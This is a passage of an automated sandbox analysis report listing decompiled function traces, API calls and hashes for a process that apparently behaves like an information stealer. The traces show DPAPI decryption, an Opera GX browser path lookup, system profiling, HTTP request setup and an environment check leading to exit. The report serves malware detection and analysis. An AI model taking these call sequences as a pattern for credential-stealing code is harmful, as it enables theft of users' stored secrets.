InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004181D6
InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004181F0

Part of subcall function 00410D90: GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00410DC8
Part of subcall function 00410D90: GetVolumeInformationA.KERNEL32(00421EB9,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00410E01
Part of subcall function 00410D90: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00410E4D
Part of subcall function 00410D90: HeapAlloc.KERNEL32(00000000), ref: 00410E54

Part of subcall function 00404490: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040455A
Part of subcall function 00404490: StrCmpCA.SHLWAPI(?,0156F910,?,?,?,?,?,?,00000000), ref: 0040457A

Part of subcall function 00412870: StrCmpCA.SHLWAPI(00000000,block,00000000,?,0041826A), ref: 004128A8
Part of subcall function 00412870: ExitProcess.KERNEL32 ref: 004128B3

Part of subcall function 00405C90: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00405D5A
Part of subcall function 00405C90: StrCmpCA.SHLWAPI(?,0156F910,?,?,?,?,?,?,00000000), ref: 00405D7A

Part of subcall function 004122F0: strtok_s.MSVCRT ref: 00412330

Sleep.KERNEL32(000003E8), ref: 004185E9

Part of subcall function 00405C90: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00405F04

Part of subcall function 00413930: strtok_s.MSVCRT ref: 0041396C
Part of subcall function 00413930: strtok_s.MSVCRT ref: 004139AE

Part of subcall function 00411DF0: memset.MSVCRT ref: 00411E2B

Part of subcall function 00405C90: HttpOpenRequestA.WININET(00000000,0156F920,?,01572300,00000000,00000000,-00400100,00000000), ref: 00405F44
Part of subcall function 00405C90: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00405F6B

Strings

%, xrefs: 0041881A

Memory Dump Source

Source File: 00000001.00000002.2794222735.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2794222735.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: AddressProc$Internetlstrcpy$Open$strtok_s$HeapProcesslstrcatlstrlen$AllocConnectDirectoryExitHttpInformationOptionRequestSleepSystemTimeVolumeWindowsmemset
String ID: %
API String ID: 3292282700-2567322570
Opcode ID: e1c95a4c01a5b8944ecfee2bb706b87a2ab9dee71af13ea143bb6d54da976b17
Instruction ID: a80d5cc082a79b13c4afddcc74089088984bc40af4cfd8f7e2f84988951bca03
Opcode Fuzzy Hash: e1c95a4c01a5b8944ecfee2bb706b87a2ab9dee71af13ea143bb6d54da976b17
Instruction Fuzzy Hash: E9428F70D10358EADF10EBA5C946BDDBBB4AF19308F5041AEF54573282DB781B48CBA6

Uniqueness

Uniqueness Score: -1.00%

Function 004171B0 Relevance: 7.6, APIs: 5, Instructions: 148registrystringCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 004171F1
RegOpenKeyExA.KERNEL32(80000001,01571758,00000000,00020119,00422FC0), ref: 00417210
RegQueryValueExA.ADVAPI32(00422FC0,01572498,00000000,00000000,?,000000FF), ref: 00417234
lstrcat.KERNEL32(?,?), ref: 00417263
lstrcat.KERNEL32(?,01572438), ref: 00417277

Memory Dump Source

Source File: 00000001.00000002.2794222735.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2794222735.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$OpenQueryValuememset
String ID:
API String ID: 558315959-0
Opcode ID: 7114117b7e44a6b0a2ec1ac4c4aa7947016af69031e2551ac02debfbb669832e
Instruction ID: 74d8b735119c2182752737772a63e4f349c5be27bf2cba7256ea7a55185fa83a
Opcode Fuzzy Hash: 7114117b7e44a6b0a2ec1ac4c4aa7947016af69031e2551ac02debfbb669832e
Instruction Fuzzy Hash: 8F51E370940208ABCB18EFA0CC46FEE7779AB49704F10855EF61967281DB746A89CBE5

Uniqueness

Uniqueness Score: -1.00%

Function 00410FF0 Relevance: 7.6, APIs: 5, Instructions: 70commemoryCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(00428AE4,00000000,00000001,00428278,?,00000001,00000001,?,00000000,?,Windows: ,00000000,?,0042840C,00000000,?), ref: 0041100D
SysAllocString.OLEAUT32(?), ref: 0041101C
_wtoi64.MSVCRT ref: 00411062
SysFreeString.OLEAUT32(?), ref: 00411078
SysFreeString.OLEAUT32(00000000), ref: 0041107B

Memory Dump Source

Source File: 00000001.00000002.2794222735.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2794222735.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: String$Free$AllocCreateInstance_wtoi64
String ID:
API String ID: 1817501562-0
Opcode ID: 757001a73b8a560c4d2357d90eba04831e664b269fe4ba776794b7a64135a60a
Instruction ID: 0243a214321a8e11e6d6ada038f83521d736f052b3ccf67aedd98e01bceb802f
Opcode Fuzzy Hash: 757001a73b8a560c4d2357d90eba04831e664b269fe4ba776794b7a64135a60a
Instruction Fuzzy Hash: 72117275B00118AFC710DFA9CC84DAA7BB9EFC9344B1481AAE605C7320DA35EE81CB60

Uniqueness

Uniqueness Score: -1.00%

Function 1C25FD40 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 134fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNEL32(?,?,?,?,?), ref: 1C25FE03

Strings

winRead, xrefs: 1C25FE3D
delayed %dms for lock/sharing conflict at line %d, xrefs: 1C25FE78

Memory Dump Source

Source File: 00000001.00000002.2800152175.000000001C258000.00000020.00001000.00020000.00000000.sdmp, Offset: 1C250000, based on PE: true

Associated: 00000001.00000002.2800129308.000000001C250000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800152175.000000001C251000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800152175.000000001C3B6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800152175.000000001C45D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800763135.000000001C45F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800763135.000000001C468000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800855960.000000001C492000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800883135.000000001C49A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800883135.000000001C49D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2800883135.000000001C49F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c250000_RegAsm.jbxd

Similarity

API ID: FileRead
String ID: delayed %dms for lock/sharing conflict at line %d$winRead
API String ID: 2738559852-1843600136
Opcode ID: 192b39d3a8d0334e424699d616c3ce3955a2ceeb4ea4f6d73709194494814b2f
Instruction ID: af432e8b497f3f0f0e4da85a9aaf6e8d98c8c453a1dfef82d47e6cf55d3db6bf
Opcode Fuzzy Hash: 192b39d3a8d0334e424699d616c3ce3955a2ceeb4ea4f6d73709194494814b2f
Instruction Fuzzy Hash: 3241CFB6705356ABD304DE64CD81DEFB7A9FF84210F940A2DF94487641E721F9188BB2

Uniqueness

Uniqueness Score: -1.00%

Function 0040CF50 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 107COMMON

Download Yara Rule

APIs

Part of subcall function 0040FE80: lstrcpy.KERNEL32(00000000,00418891), ref: 0040FEA9

Part of subcall function 00406E40: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,00000002,?,0040CABD,?,00000000,?,00000000,00000000), ref: 00406E77
Part of subcall function 00406E40: GetFileSizeEx.KERNEL32(00000000,?,?,0040CABD,?,00000000,?,00000000,00000000,?), ref: 00406E8D
Part of subcall function 00406E40: LocalAlloc.KERNEL32(00000040,?,?,?,0040CABD,?,00000000,?,00000000,00000000,?), ref: 00406EA8
Part of subcall function 00406E40: ReadFile.KERNEL32(00000000,00000000,?,?,00000000,?,?,0040CABD,?,00000000,?,00000000,00000000,?), ref: 00406EC1
Part of subcall function 00406E40: CloseHandle.KERNEL32(00000000,?,0040CABD,?,00000000,?,00000000,00000000,?), ref: 00406EE9

Part of subcall function 00411750: LocalAlloc.KERNEL32(00000040,?,00000000,00000001,00000004,?,00413F63,00000000,00000000), ref: 0041176C

StrStrA.SHLWAPI(00000000,01572198,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040CFBB

Part of subcall function 00406F10: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,0040648B,00000000,00000000), ref: 00406F37
Part of subcall function 00406F10: LocalAlloc.KERNEL32(00000040,00000000,?,0040648B,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00406F46
Part of subcall function 00406F10: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,0040648B,00000000,00000000), ref: 00406F5D
Part of subcall function 00406F10: LocalFree.KERNEL32(?,?,0040648B,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00406F6C

memcmp.MSVCRT ref: 0040CFF9

Part of subcall function 00406F90: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00406FB5
Part of subcall function 00406F90: LocalAlloc.KERNEL32(00000040,?,?), ref: 00406FCD
Part of subcall function 00406F90: LocalFree.KERNEL32(?), ref: 00406FEE

Strings

, xrefs: 0040D024
DPAPI, xrefs: 0040CFF3

Memory Dump Source

Source File: 00000001.00000002.2794222735.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2794222735.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Local$Alloc$CryptFile$BinaryFreeString$CloseCreateDataHandleReadSizeUnprotectlstrcpymemcmp
String ID: $DPAPI
API String ID: 512175977-1819349886
Opcode ID: 228dde18d6380654e1e01747a0d40dda2febb3b458d53894edb870cd61412a9d
Instruction ID: 04e0419f88c9d5c658d70bb4a20b994614d1a13e8e8d8d930ac63f7b7d88e2a3
Opcode Fuzzy Hash: 228dde18d6380654e1e01747a0d40dda2febb3b458d53894edb870cd61412a9d
Instruction Fuzzy Hash: 3E3193B1D001099BCB10DF95DC42FEFB779AB84318F14422AE915B32C2EA395A49C6E5

Uniqueness

Uniqueness Score: -1.00%

Function 00410530 Relevance: 6.0, APIs: 4, Instructions: 39memoryregistryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 00410545
HeapAlloc.KERNEL32(00000000), ref: 0041054C
RegOpenKeyExA.KERNEL32(80000002,0156B940,00000000,00020119,00000000), ref: 0041056B
RegQueryValueExA.KERNEL32(00000000,015719B8,00000000,00000000,00000000,000000FF), ref: 00410586

Memory Dump Source

Source File: 00000001.00000002.2794222735.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2794222735.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$AllocOpenProcessQueryValue
String ID:
API String ID: 3676486918-0
Opcode ID: ebbb83980b96e7640f25af26754c2ff0e91fd82364fa7b8dbd91e5869d307b29
Instruction ID: 6759878f835c56c9ca0f427d276befcc344c5531ee7d20c41334848b2fd0dccc
Opcode Fuzzy Hash: ebbb83980b96e7640f25af26754c2ff0e91fd82364fa7b8dbd91e5869d307b29
Instruction Fuzzy Hash: 0CF04FB9640209BFD714DBA0DC59FAB7BBEEB45B41F105159BA0597250D6709900CBB0

Uniqueness

Uniqueness Score: -1.00%

Function 0040E510 Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 488COMMON

Download Yara Rule

APIs

Part of subcall function 0040FE80: lstrcpy.KERNEL32(00000000,00418891), ref: 0040FEA9

StrCmpCA.SHLWAPI(00000000,Opera GX,00427AE6,00427AE3,?,?), ref: 0040E56D

Part of subcall function 004116F0: SHGetFolderPathA.SHELL32(00000000,?{B,00000000,00000000,?,?,00000000), ref: 00411728

Part of subcall function 0040FFB0: lstrcpy.KERNEL32(00000000), ref: 00410013
Part of subcall function 0040FFB0: lstrcat.KERNEL32(?,00000000), ref: 0041001F

Part of subcall function 0040FF60: lstrcpy.KERNEL32(00000000), ref: 0040FFA0

Part of subcall function 00410040: lstrlen.KERNEL32(?,?,?,?,?,?,00421D69,000000FF,?,004188B7,?,01562EF0,?), ref: 0041007C
Part of subcall function 00410040: lstrcpy.KERNEL32(00000000), ref: 004100A7
Part of subcall function 00410040: lstrcat.KERNEL32(?,?), ref: 004100B1

Part of subcall function 0040FEC0: lstrcpy.KERNEL32(00000000), ref: 0040FEE8

Part of subcall function 00411690: GetFileAttributesA.KERNEL32(00000000,00000000,00000000,00421FB8,000000FF,?,0040E94A,?,00000000,00000000,00000000), ref: 004116B7

Part of subcall function 0040CF50: StrStrA.SHLWAPI(00000000,01572198,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040CFBB
Part of subcall function 0040CF50: memcmp.MSVCRT ref: 0040CFF9

Strings

$, xrefs: 0040EB1E
Opera GX, xrefs: 0040E556

Memory Dump Source

Source File: 00000001.00000002.2794222735.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2794222735.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$AttributesFileFolderPathlstrlenmemcmp
String ID: $$Opera GX
API String ID: 1439182418-3699434461
Opcode ID: 1749706aa2db81fa6de757973773e7b7360e6dd657e733d53bc66fe27f04b27c
Instruction ID: 17207a86614afdb77cff5a3d56c68c7749fc063a50330c9fb849252114e4ac69
Opcode Fuzzy Hash: 1749706aa2db81fa6de757973773e7b7360e6dd657e733d53bc66fe27f04b27c
Instruction Fuzzy Hash: 99128F71911248EACB14EBE5C945BEDBBB8AF19304F14817EF90573286DB781B0CC7A6

Uniqueness

Uniqueness Score: -1.00%

Function 004140D0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 105stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(00000000), ref: 00414100
StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 004141CF

Strings

ERROR, xrefs: 004141C9

Memory Dump Source

Source File: 00000001.00000002.2794222735.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2794222735.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrlen
String ID: ERROR
API String ID: 1659193697-2861137601
Opcode ID: df3b25b72e81ea361da62db3694fc4a8dabbd1a4e0db10303024cbd4f1e4006f
Instruction ID: 7a4a8b2ae2701fe1ed20729628e627548499ab356697860d70efb29cd96e5671
Opcode Fuzzy Hash: df3b25b72e81ea361da62db3694fc4a8dabbd1a4e0db10303024cbd4f1e4006f
Instruction Fuzzy Hash: 8341B6B1900244FFCB00EFA9D846BDE7BB4AB19354F10812EF505A7281DB389648CBE5

Uniqueness

Uniqueness Score: -1.00%

Function 00413D40 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 93COMMON

Download Yara Rule

APIs

Part of subcall function 0040FEC0: lstrcpy.KERNEL32(00000000), ref: 0040FEE8

Part of subcall function 00405A30: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00405AA8
Part of subcall function 00405A30: StrCmpCA.SHLWAPI(?,0156F910,?,?,?,?,?,?,00000004), ref: 00405AC0
Part of subcall function 00405A30: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00405AE4
Part of subcall function 00405A30: HttpOpenRequestA.WININET(00000000,GET,?,01572300,00000000,00000000,-00400100,00000000), ref: 00405B1B
Part of subcall function 00405A30: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00405B3F

StrCmpCA.SHLWAPI(00000000,ERROR,?,?,?,?,?,?,?,?,?,?,?,?,00000000,0042248F), ref: 00413DB5

Strings

ERROR, xrefs: 00413DA3
ERROR, xrefs: 00413E0E

Memory Dump Source

Source File: 00000001.00000002.2794222735.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2794222735.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Internet$Open$ConnectHttpOptionRequestlstrcpy
String ID: ERROR$ERROR
API String ID: 1815705353-2579291623
Opcode ID: 60aaeff547289181ae8f8bb4519d178c4f6478f03eee4e5f3c1696f8079ee93f
Instruction ID: 2de14b8495628cd286d50378bf444954eaaf3636dd8b2d3ca14243e0d5a7f802
Opcode Fuzzy Hash: 60aaeff547289181ae8f8bb4519d178c4f6478f03eee4e5f3c1696f8079ee93f
Instruction Fuzzy Hash: 99414F30914289DADB10EBA5C5057DDBBE8AF19308F5041AEF905636C2DFB81B08C7F6

Uniqueness

Uniqueness Score: -1.00%

Function 00411A40 Relevance: 4.5, APIs: 3, Instructions: 31COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000410,00000000,?), ref: 00411A5C
K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 00411A77
CloseHandle.KERNEL32(00000000), ref: 00411A7E

Memory Dump Source

Source File: 00000001.00000002.2794222735.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2794222735.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CloseFileHandleModuleNameOpenProcess
String ID:
API String ID: 3183270410-0
Opcode ID: 4989c77146abbc5ee76c948889740fc30d2da5c3921abf62d6455a5f4ed49132
Instruction ID: 660ba3e5b87f2d6f46484b434598976fca83c63f4e6e6eb2b951d01fded5b4af
Opcode Fuzzy Hash: 4989c77146abbc5ee76c948889740fc30d2da5c3921abf62d6455a5f4ed49132
Instruction Fuzzy Hash: AAF0273560112867D720AB44CC05FDE77689F05700F000194FF48AB2D0DBB05EC487D4

Uniqueness

Uniqueness Score: -1.00%

Function 004102C0 Relevance: 4.5, APIs: 3, Instructions: 23memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,0040105B,01562EE0,0041887F), ref: 004102CC
HeapAlloc.KERNEL32(00000000,?,?,?,0040105B,01562EE0,0041887F), ref: 004102D3
GetComputerNameA.KERNEL32(00000000,0041887F), ref: 004102E7

Memory Dump Source

Source File: 00000001.00000002.2794222735.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2794222735.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$AllocComputerNameProcess
String ID:
API String ID: 4203777966-0
Opcode ID: 00f558dfb3a4b80afd8e40931e88319d94c69cb643d845e7bfdafbd5d6e961f5
Instruction ID: 406b522a559848795045bf452203491930279dbdd2025bb65e998ac759834946
Opcode Fuzzy Hash: 00f558dfb3a4b80afd8e40931e88319d94c69cb643d845e7bfdafbd5d6e961f5
Instruction Fuzzy Hash: 68E08CB5741229ABD3109BE9AC0DBDBBAEDDB06B51F501196BB04D3240EAF08D0087E8

Uniqueness

Uniqueness Score: -1.00%

Function 00401050 Relevance: 4.5, APIs: 3, Instructions: 19stringCOMMON

Download Yara Rule

APIs

Part of subcall function 004102C0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,0040105B,01562EE0,0041887F), ref: 004102CC
Part of subcall function 004102C0: HeapAlloc.KERNEL32(00000000,?,?,?,0040105B,01562EE0,0041887F), ref: 004102D3
Part of subcall function 004102C0: GetComputerNameA.KERNEL32(00000000,0041887F), ref: 004102E7

strcmp.MSVCRT ref: 0040105C

Part of subcall function 00410280: GetProcessHeap.KERNEL32(00000000,00000104,?,01562EF0,?,00401074,01562EF0,?,0041887F), ref: 0041028C
Part of subcall function 00410280: HeapAlloc.KERNEL32(00000000,?,01562EF0,?,00401074,01562EF0,?,0041887F), ref: 00410293
Part of subcall function 00410280: GetUserNameA.ADVAPI32(00000000,01562EF0), ref: 004102A7

strcmp.MSVCRT ref: 00401075
ExitProcess.KERNEL32 ref: 00401082

Memory Dump Source

Source File: 00000001.00000002.2794222735.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2794222735.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$Process$AllocNamestrcmp$ComputerExitUser
String ID:
API String ID: 2098570390-0
Opcode ID: 62a4c53fcb9bf593e476f24c714467af4436e90a2949d6c67d663f3053a85b1f
